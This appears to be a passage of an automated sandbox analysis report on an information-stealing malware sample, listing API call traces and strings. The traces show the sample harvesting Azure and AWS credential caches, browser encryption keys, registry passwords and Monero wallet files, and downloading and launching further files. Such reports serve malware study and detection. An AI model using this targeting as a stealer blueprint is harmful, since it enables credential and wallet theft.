                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 3e2e3470007de75603556340ada65818eca8e772ad74b6250c7a94e55ed72c33
                        • Instruction ID: b3dda6b7bc446da6a7c9e1ef926ded793b3c0ab959d0c4dd16454bc92d45a06e
                        • Opcode Fuzzy Hash: 3e2e3470007de75603556340ada65818eca8e772ad74b6250c7a94e55ed72c33
                        • Instruction Fuzzy Hash: F441A5B9A5130867D750F7B0EC47FED733AAB25704F0044987649661C2EEB46BC9CB92
                        Function 006E2E30 Relevance: 21.5, APIs: 3, Strings: 9, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe$h
                        • API String ID: 2507796910-1549074242
                        • Opcode ID: bfc44734c2e130df57d9b216652b20d12a3cd12d8948cc393d7e4a89d99d60d6
                        • Instruction ID: 458c41b570c2bb0372457f8d1b9813c2516b66045377a7053f345ac2f2d69ede
                        • Opcode Fuzzy Hash: bfc44734c2e130df57d9b216652b20d12a3cd12d8948cc393d7e4a89d99d60d6
                        • Instruction Fuzzy Hash: 66123F718122489ADB55EBE1DC92FEEB73AAF14300F41415DF50666192EF303B4ACF6A
                        Function 006E4280 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E42EC
                        • lstrcat.KERNEL32(?,00E4E038), ref: 006E430B
                        • lstrcat.KERNEL32(?,?), ref: 006E431F
                        • lstrcat.KERNEL32(?,00E4CFF0), ref: 006E4333
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8D90: GetFileAttributesA.KERNEL32(00000000,?,006D1B54,?,?,006F564C,?,?,006F0E1F), ref: 006E8D9F
                          • Part of subcall function 006D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D39
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E93C0: GlobalAlloc.KERNEL32(00000000,006E43DD,006E43DD), ref: 006E93D3
                        • StrStrA.SHLWAPI(?,00E4DEA0), ref: 006E43F3
                        • GlobalFree.KERNEL32(?), ref: 006E4512
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                          • Part of subcall function 006D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
                          • Part of subcall function 006D9AC0: LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 006E44A3
                        • StrCmpCA.SHLWAPI(?,006F08D1), ref: 006E44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006E44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 006E44E5
                        • lstrcat.KERNEL32(00000000,006F0FB8), ref: 006E44F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID: 8
                        • API String ID: 3541710228-3897458245
                        • Opcode ID: b2008e7caf9c2b6bd1529388c7f7f2b43645383cd4554585e83de6139ac7af3f
                        • Instruction ID: 784946509632c3c12df3dc433973cf264494647f9fc092aca594bb873a9ec510
                        • Opcode Fuzzy Hash: b2008e7caf9c2b6bd1529388c7f7f2b43645383cd4554585e83de6139ac7af3f
                        • Instruction Fuzzy Hash: 427157B6D11208ABDB54EBF0DC85FEE737AAB48300F00859CF60597181EA74DB45CBA5
                        Function 006E9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006E906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: c282363f66107a060bfbe554be02330b1a1400976b95b3e8c3835960edd8dfbb
                        • Instruction ID: 953a5bf0164ba51f06886a861845a341d6666f3ef9f6881cd642a8f5b64180a7
                        • Opcode Fuzzy Hash: c282363f66107a060bfbe554be02330b1a1400976b95b3e8c3835960edd8dfbb
                        • Instruction Fuzzy Hash: 3D71EAB5A11208ABDB04DFE4DC89FEEB7B9BF48300F108508F615A7294DB74AA05DB61
                        Function 006E52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D6280: InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                          • Part of subcall function 006D6280: StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                          • Part of subcall function 006D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                          • Part of subcall function 006D6280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                          • Part of subcall function 006D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                          • Part of subcall function 006D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5318
                        • lstrlen.KERNEL32(00000000), ref: 006E532F
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 006E5364
                        • lstrlen.KERNEL32(00000000), ref: 006E5383
                        • lstrlen.KERNEL32(00000000), ref: 006E53AE
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 12c3526e5ec6f53a2cf4160f0bb15f6ae98a94e0250f3a7dbe7f394e9ae0579d
                        • Instruction ID: 1fdc06e5a780c6105435f7b3ff527fdf1ceacbc400084b576d40174bbb925559
                        • Opcode Fuzzy Hash: 12c3526e5ec6f53a2cf4160f0bb15f6ae98a94e0250f3a7dbe7f394e9ae0579d
                        • Instruction Fuzzy Hash: 0F512E70912288ABDB54FFA1C992AFE377BAF10304F51401CF8065A192EF347B46CB66
                        Function 006D60A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                        • InternetOpenA.WININET(006F0DF7,00000001,00000000,00000000,00000000), ref: 006D610F
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006D618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006D61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 006D61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006D620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 006D6249
                        • InternetCloseHandle.WININET(?), ref: 006D6253
                        • InternetCloseHandle.WININET(00000000), ref: 006D6260
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-2740779761
                        • Opcode ID: 13d79e899923d907bcaf511f5694b9a1d4432cef80735fd761be86069b75e409
                        • Instruction ID: 49092855b1f681f66b5d7300f2f71febe6493b38925abcfe6c701c605ff40180
                        • Opcode Fuzzy Hash: 13d79e899923d907bcaf511f5694b9a1d4432cef80735fd761be86069b75e409
                        • Instruction Fuzzy Hash: C8515BB1E11208ABDB20DBA0DC45BEE77BAAB44701F108099F605A72C1DB746F85CF95
                        Function 006D1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D12B4
                          • Part of subcall function 006D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 006D12BB
                          • Part of subcall function 006D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006D12D7
                          • Part of subcall function 006D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006D12F5
                          • Part of subcall function 006D12A0: RegCloseKey.ADVAPI32(?), ref: 006D12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 006D134F
                        • lstrlen.KERNEL32(?), ref: 006D135C
                        • lstrcat.KERNEL32(?,.keys), ref: 006D1377
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 006D1465
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 006D14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: aae9c854cd7af6929f1602be60cbf2c5f1ca53c17976d484b60163ed613b8e65
                        • Instruction ID: 1c44d07bfdc880669d9bb7c6d9292caaf1b72f2b72446bacb14c80bc0ccfb296
                        • Opcode Fuzzy Hash: aae9c854cd7af6929f1602be60cbf2c5f1ca53c17976d484b60163ed613b8e65
                        • Instruction Fuzzy Hash: EF5157B1D5125857DB55EBA1DC92BEE733E9F50300F41419CB60A62082EE706F85CBAA
                        Function 006D75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D733A
                          • Part of subcall function 006D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006D73B1
                          • Part of subcall function 006D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006D740D
                          • Part of subcall function 006D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 006D7452
                          • Part of subcall function 006D72D0: HeapFree.KERNEL32(00000000), ref: 006D7459
                        • lstrcat.KERNEL32(00000000,006F17FC), ref: 006D7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 006D765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D768F
                        • lstrcat.KERNEL32(00000000,006F1804), ref: 006D76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D76D3
                        • lstrcat.KERNEL32(00000000,006F1808), ref: 006D76ED
                        • task.LIBCPMTD ref: 006D76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: ba50a78ba9b5107bb5f52efdccf1475db8d65903049288b18cf4f032b90c2119
                        • Instruction ID: b9e440ae5db33544dc330d08259017a2091a6b99d40d585e45d8f3aaea58d538
                        • Opcode Fuzzy Hash: ba50a78ba9b5107bb5f52efdccf1475db8d65903049288b18cf4f032b90c2119
                        • Instruction Fuzzy Hash: 58317CB5E1610ADFCB44EBE4DC89DFE737ABB48301B108019F102A7290EA34AD46DB56
                        Function 006E8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E4E4A0,00000000,?,006F0E2C,00000000,?,00000000), ref: 006E8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006E8158
                        • __aulldiv.LIBCMT ref: 006E8172
                        • __aulldiv.LIBCMT ref: 006E8180
                        • wsprintfA.USER32 ref: 006E81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
